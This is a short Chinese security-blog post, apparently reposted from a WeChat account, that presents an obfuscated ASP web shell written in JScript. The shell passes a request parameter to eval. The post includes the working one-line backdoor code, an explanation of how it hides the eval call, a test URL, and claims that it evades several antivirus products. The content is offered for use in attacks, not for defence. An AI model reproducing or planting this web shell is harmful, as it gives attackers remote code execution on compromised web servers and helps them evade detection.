【奇技淫巧】ASP一句话也可以奇葩

  • A+
所属分类:安全文章

【奇技淫巧】ASP一句话也可以奇葩

        大家都造PHP千变万化,从变量,数组,赋值,运算,函数等。。。没有一样不奇葩的!所以常说PHP的木马永远杀不干净。

        但是asp就悲剧了,它的脚本VBS用法很死板,不像PHP语法各种灵活和奇葩,不过别忘了asp是可以自定义脚本的,如果改成Javascript脚本来执行代码,也能像PHP木马一样奇葩

下面分享一下偶的一匹悍马
<%@LANGUAGE="javascript"%>
<%_()(_(!-''));function _(__){if(__){return Request('_')+''}else{return  eval
}}
%>


代码简单说明:
第一句,声明脚本为javascript
第二句,自定义了个函数_,当传入为空时返回 eval 函数,当传入为真时返回 _ 接收的值; !-'' 是1(True)的变形 (和PHP变形一样有木有?)

代码原形:

eval(Request('_')+'') ,注意 +'' 绝对不能忽略,这是把接来的值转为串,否则不能识别;

手连测试:
test.asp?_=Response.write%20(Date());  //输出当前时间

总结:
        用javascript来写asp,语法就能像php一样各种奇葩,但是注意以下几点:

1. 虽然能免杀狗,盾和360,还是有关键eval,所以对于靠关键词查杀的简单脚本和工具就报出来了

2.由于用的javscript脚本,所以用一般的客户端,如菜刀,斧头。。都连不上,有待码农开发个客户端。。。


【奇技淫巧】ASP一句话也可以奇葩

本文始发于微信公众号(T00ls):【奇技淫巧】ASP一句话也可以奇葩

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: